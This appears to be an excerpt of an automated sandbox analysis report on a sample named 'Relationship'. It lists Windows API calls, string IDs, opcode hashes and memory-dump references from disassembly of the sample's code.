                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                            • Opcode ID: 078d648d906460fe054a2d94c9a3ffe9ac90fb7c59693ed438f42038a2f34f2e
                                                                                                                                                                                                                                                                            • Instruction ID: 30e812978f527026057f30617e5edf34cd4dab1625dac74cfe8c2975d715b4bb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 078d648d906460fe054a2d94c9a3ffe9ac90fb7c59693ed438f42038a2f34f2e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4941F87C5047C96DFF31466284047A5BEB06F15385F08825ADDE64A1C2EBA49FCCCB6B
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                            • Opcode ID: fc544a916094acfebfb6f862b04e2e9f07a9c9b77b32d41bd239d6b5711b7aef
                                                                                                                                                                                                                                                                            • Instruction ID: 209bd57b0624d1ed553c9ed83c4559b0904aee5b17c90e7a25fdb483e9ababaf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc544a916094acfebfb6f862b04e2e9f07a9c9b77b32d41bd239d6b5711b7aef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0651B171A0011A9BCF14DFA8C9519BEB7A5FF65360B208229E93AE72C4DB31DE41C791
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 00C741D1
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C741DC
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00C90B44,?), ref: 00C74236
                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00C742A9
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C74341
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C74393
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                            • Opcode ID: 0c4cf2d576d5bb29ea50a5fc3aadab20529a0ceae7db05eff046d0c71151adf8
                                                                                                                                                                                                                                                                            • Instruction ID: 0ebdd436be14f6c12d1dfaac26a8a49ca713de89e9afacf7b8ed870a0b8fbbca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c4cf2d576d5bb29ea50a5fc3aadab20529a0ceae7db05eff046d0c71151adf8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4761A1716087019FC314DF65C888F6EBBE8EF49714F108959F999972A2C770ED48CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00C68C9C
                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C68CAC
                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C68CB8
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C68D55
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68D69
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68D9B
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C68DD1
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68DDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 6a753a7dac782c999dec25e819d92b9566d71a36f46f6893c4cb2ffc95063fbd
                                                                                                                                                                                                                                                                            • Instruction ID: aeae85d71648d25f7b0a0accf7a1940f6b204f7cd202cb2a4b7c886c5395676b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a753a7dac782c999dec25e819d92b9566d71a36f46f6893c4cb2ffc95063fbd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D617271504305AFCB10EF60C8849AEB7E8FF99310F04495DF999C7291DB31E949CB52
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 00C84715
                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00C84724
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C847AC
                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00C847C0
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C847CA
                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C847F7
                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00C847FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                            • Opcode ID: a90905d1835a8141c99b68179cd43b85f5e68b8bb9a5465e515a4ba040fd52cc
                                                                                                                                                                                                                                                                            • Instruction ID: 040853b788459a347529d5abc7c7da860fd55297fc8447499d645799b4a9c54a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a90905d1835a8141c99b68179cd43b85f5e68b8bb9a5465e515a4ba040fd52cc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE417AB5A0120AEFDB18EF64D844FAE7BB5FF09318F144029FA5697390D770AA14CB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C528B1
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C528BC
                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C528D8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C528DB
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C528E4
                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C528F8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C528FB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 5d20e23d6d60359a1d547561a4d23a388db5c673f13c5b5ddb73909b18d87787
                                                                                                                                                                                                                                                                            • Instruction ID: d57564f32ce3e1125af059619eaa4dbdf292ee8f9019937e8fd1f7995efb13f4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d20e23d6d60359a1d547561a4d23a388db5c673f13c5b5ddb73909b18d87787
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A21C279900118BBCF04AFA0CC85EFEBBB8EF06311F000156B962A32D1DB35598CDB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C52990
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C5299B
                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C529B7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C529BA
                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C529C3
                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C529D7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C529DA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: d361c9ec68ba2d272a493e3a94b40c2006ab2038a21d82513d143ef280d237b6
                                                                                                                                                                                                                                                                            • Instruction ID: 764b65ad6bda3b3a092e89d88f70936abf9a7abaa285ed463ffb2dcc404c52a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d361c9ec68ba2d272a493e3a94b40c2006ab2038a21d82513d143ef280d237b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8921A1B9900118BBCF05AFA0CC85FFEBBB8EF05311F004456B952A7295DB79498DDB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C84539
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C8453C
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C84563
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C84586
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C845FE
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C84648
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C84663
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C8467E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C84692
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C846AF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                            • Opcode ID: 81563bd5daff3a32cea1a391728769b55444ee57b74271049c72953a341b1019
                                                                                                                                                                                                                                                                            • Instruction ID: c8d2b250ad916b465d9380ebaae06c3b97af081ff6dfe4d8fd406f96bcfc9689
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81563bd5daff3a32cea1a391728769b55444ee57b74271049c72953a341b1019
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC617C75A00209AFDB14EFA4CC81FEE77B8EF09714F100169FA14E72A1D774AA45DB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C5BB18
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB2C
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00C5BB33
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB42
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5BB54
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB6D
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB7F
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BBC4
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BBD9
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BBE4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                            • Opcode ID: d308bdfc537cde8fcb5b8a7a246f019a16afef81cb5b3f80b2c49e83ed2efa99
                                                                                                                                                                                                                                                                            • Instruction ID: 097d23e107a4e7470b43f4628897691396fb523aa188d9fb81f5c428577efd22
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d308bdfc537cde8fcb5b8a7a246f019a16afef81cb5b3f80b2c49e83ed2efa99
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 733191BA904208AFDB249B14EC98F6D7BB9EB44313F108005FE16D71E4D7B49E848B28
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23007
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23013
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2301E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23029
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23034
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2303F
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2304A
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23055
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23060
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2306E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4ad85dc9c53dc35f6a0e3341e460ba5b9e11c0f3938fb2e9da2d75f0bcaf4b30
                                                                                                                                                                                                                                                                            • Instruction ID: 0a0256e58aebaf4209ad41cd292ded38c553ce954b47d03485350855bc435869
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ad85dc9c53dc35f6a0e3341e460ba5b9e11c0f3938fb2e9da2d75f0bcaf4b30
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B11A276140118BFCB01EF94E842CDD3BA5EF09350FC144A5FA089BA22DA32EA51EF90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BF2AF9
                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00BF2B98
                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00BF2D7D
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C33A1B
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C33A80
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C33AAD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                            • Opcode ID: 02e458d8cb0f4f3de8eeeb7a74087a252018d8c12241bf68ab7a8d8f734ed21d
                                                                                                                                                                                                                                                                            • Instruction ID: 43823c24ae4b0364a2dc16e198d0150774fbe36a0c7629a4b3ef55b6c5b99933
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02e458d8cb0f4f3de8eeeb7a74087a252018d8c12241bf68ab7a8d8f734ed21d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAD17B31711252DFCB29EF54C885A69F7A0FF04714F1142EDE94AAB2A2CB30AE56DF44
                                                                                                                                                                                                                                                                            APIs
